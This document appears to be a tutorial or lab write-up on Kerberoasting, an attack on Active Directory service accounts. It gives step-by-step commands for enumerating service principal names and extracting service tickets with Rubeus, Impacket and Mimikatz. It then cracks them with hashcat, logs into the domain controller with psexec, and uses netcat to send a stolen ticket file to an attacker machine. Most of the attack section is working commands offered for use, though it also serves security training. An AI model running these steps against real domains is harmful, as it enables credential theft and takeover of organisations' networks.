Kerberoasting is a method used to extract password hashes of Active Directory service accounts, which are often used for running automated tasks or services. The attacker identifies vulnerable service accounts and requests a service ticket for the account, which contains an encrypted password hash. This encrypted hash can be extracted by the attacker and then subjected to brute-force cracking offline, allowing the attacker to obtain the password. If the service account has Domain Admin or Admin privileges, the attacker will be able to escalate privileges through Kerberoasting.
The attacker’s goal: To get a ticket from a service bring run by a service account with elevated privileges. The service account also needs to have a weak password so it can be easily cracked.
What you’ll learn
- Enumerating using only the windows command line
- Enumerating with PowerView.ps1
- Exploiting with Rubeus.exe
- Exploiting with Impacket’s GetUserSPNs
- Exploiting with Mimikatz.exe and PowerShell
- Cracking the krb5tgs hash using Hashcat
Enumerating with CMD Prompt
For the enumeration, we’re trying to find service accounts that have Kerberos Service Principal Names (SPNs).
Scenario: There are two machines: A Windows 10 workstation and a Domain Controller. The Windows 10 machine is part of the Domain Controller. We have a shell on the Windows 10 machine as user1 who is part of the Domain Users group. Our goal is to get Domain Admin and log into the Domain Controller.
We can query for service accounts using the builtin windows command setspn
setspn -Q */*
We’ve got an SPN running as the “SQL Service” user, and the name of this service is “MSSQLSvc”. But “SQL Service” is the full name of the user, we need the USERNAME. Lets list all the users in the domain:
net user /domain
In the screenshot above, we can see the “sqlservice” username.
To confirm that the username “sqlservice” belongs to the “SQL Service” user, we can check with this
net user sqlservice /domain
The output also tells us that the sqlservice user is part of the Domain Admins group.
Enumerating with PowerView.ps1
We’re going to replicate the same steps above but this time with PowerView.ps1. I used this method to copy it over.
Once its in the Windows 10 machine, we need to run the file. First, change the cmd prompt to a powershell prompt by typing “powershell”
powershell
Then, we can run the script by doing
. .\PowerView.ps1
Now, lets check for the service accounts by typing
Get-NetUser -SPNScrolling down the output, we see a service account with the account name “sqlservice”
PowerView can also let us query for all the Domain Admins in the domain
Get-NetGroupMember -GroupName "Domain Admins"
The output above tells us that sqlservice is in the Domain Admins group.
Both the first and second enumeration gave us the following information
- There is a service that has the SPN “MSSQLSvc/sqlserver:55000”
- That service is running as the “sqlservice” user
- The “sqlservice” user is in the Domain Admin group
With this information, lets move on and try to escalate privileges through Kerberoasting.
Exploiting the vulnerability
Exploit 1 (Rubeus.exe)
All this method requires is one command.
.\Rubeus.exe kerberoast
Then copy the hash to a file in Kali. Make sure to copy the ENTIRE hash (including the $krb5tgs)
We can use hashcat on the file to crack it
hashcat -m 13100 ticket.txt /home/activepwn/Documents/rockyou.txt
We are able to crack the password and get the password for the service user
Lets try to login to the Domain Controller with the sqlservice user’s credentials. We can try using Impacket’s psexec.
impacket-psexec WANDA.local/sqlservice:Password1@192.168.5.5 
Exploit 2 (Impacket’s GetUserSPN.py)
To kerberoast remotely with impacket, you need a Domain User password in plain text.
impacket-GetUserSPNs -request -dc-ip <IP_DOMAINCONTROLLER> <DOMAIN.local>/<user>
Now you can copy and paste this into a file and crack it.
Exploit 3 (PowerShell and Mimikatz.exe)
To launch a Kerberoasting attack against the “MSSQLSvc” service, we need to obtain its service ticket.
Lets type klist to check our cached tickets. We can see two krbtgt tickets.
We can request for the encrypted service ticket using Powershell commands
powershell
Add-Type -AssemblyName System.IdentityModelNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<USERNAME_OF_SERVICE>'
If we type klist again, we can see that the ticket has been cached
Now we need to take this ticket back to our Kali machine. To do this, we’ll use mimikatz.exe. You can transfer it over using this method.
Once its been downloaded to the Windows machine, run it.
Once mimikatz is running, we can run export the tickets
kerberos::list /export
Note: Most of Mimikatz commands need Administrator privileges to run but we can still export tickets even as a user.
Now lets exit Mimikatz and check the current directory to see if the ticket is there.
To bring this ticket back to Kali, we can use a netcat binary. You can transfer the binary using this method.
Before running the netcat binary, go to Kali and set up a netcat listener that will listen for the .kirbi file
nc -lvp 80 > <FILE_TO_TRANSFER>
Once that’s done, go back to the Windows machine and send the file over. Make sure you exit powershell before running this command since powershell likes to give errors for the < and > operators
.\nc64.exe 192.168.4.4 80 -w 3 < <FILE_TO_TRANSFER>
Back on Kali, we see that the file successfully downloaded
Before we can start cracking it, we need to convert the ticket to a hash first
kirbi2john <FILE_TO_TRANSFER> > ticket.txt
Then we can crack it using hashcat like we did before
We were successfully able to escalate privileges through Kerberoasting using three different methods
